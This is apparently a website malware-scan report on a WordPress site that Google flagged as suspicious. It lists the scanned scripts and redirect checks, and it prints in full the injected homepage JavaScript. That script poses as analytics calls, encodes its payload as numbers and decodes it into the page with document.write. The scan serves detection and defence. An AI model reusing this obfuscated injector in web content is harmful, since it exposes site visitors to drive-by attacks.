Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nicolechildersonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nicolechildersonline.com/ | 200 OK Content-Length: 69386 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setPageId', '6918518510413211616916718518716717818817517118916518719']); _gw1.push(['_trackPageview', '3182181185175186175181180128167168185181178187186171129']); _gw1.push(['_trackPageview', '1691781751821281841711691861101221241191821901141671871']); _gw1.push(['_setPageId', '8618111416718718618111412212411918219011112919513011718']); _gw1.push(['_setPageId', '5186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://nicolechildersonline.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/gallery-plugin/fancybox/jquery.mousewheel-3.0.4.pack.js?ver=3.5.2 | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/gallery-plugin/fancybox/jquery.fancybox-1.3.4.pack.js?ver=3.5.2 | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3 | 200 OK Content-Length: 9986 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-includes/js/json2.min.js?ver=2011-02-23 | 200 OK Content-Length: 20342 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/mootools-core-1.3.2-full-compat.js?ver=1.3.2 | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/scrollGallery.js?ver=1.12 | 200 OK Content-Length: 12115 Content-Type: application/x-javascript | clean |
http://nicolechildersonline.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/powertools-mobile-1.1.1.js?ver=1.1.1 | 200 OK Content-Length: 4656 Content-Type: application/x-javascript | clean |
http://dtym7iokkjlif.cloudfront.net/media/js/jquery.shareaholic-publishers-sb.min.js?ver=6.1.2.0 | 200 OK Content-Length: 49666 Content-Type: application/javascript | clean |
http://dtym7iokkjlif.cloudfront.net/media/js/jquery.shareaholic-share-buttons.min.js?ver=6.1.2.0 | 200 OK Content-Length: 22653 Content-Type: application/javascript | clean |
http://dtym7iokkjlif.cloudfront.net/media/js/jquery.shareaholic-publishers-rd.min.js?ver=6.1.2.0 | 200 OK Content-Length: 440 Content-Type: application/javascript | clean |
http://nicolechildersonline.com/wp-content/themes/bueno/includes/js/general.js?ver=3.5.2 | 200 OK Content-Length: 697 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nicolechildersonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:01:28 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: nicolechildersonline.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 12:01:28 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: nicolechildersonline.com
Referer: http://www.google.com/search?q=nicolechildersonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nicolechildersonline.com
Referer: http://www.google.com/search?q=nicolechildersonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.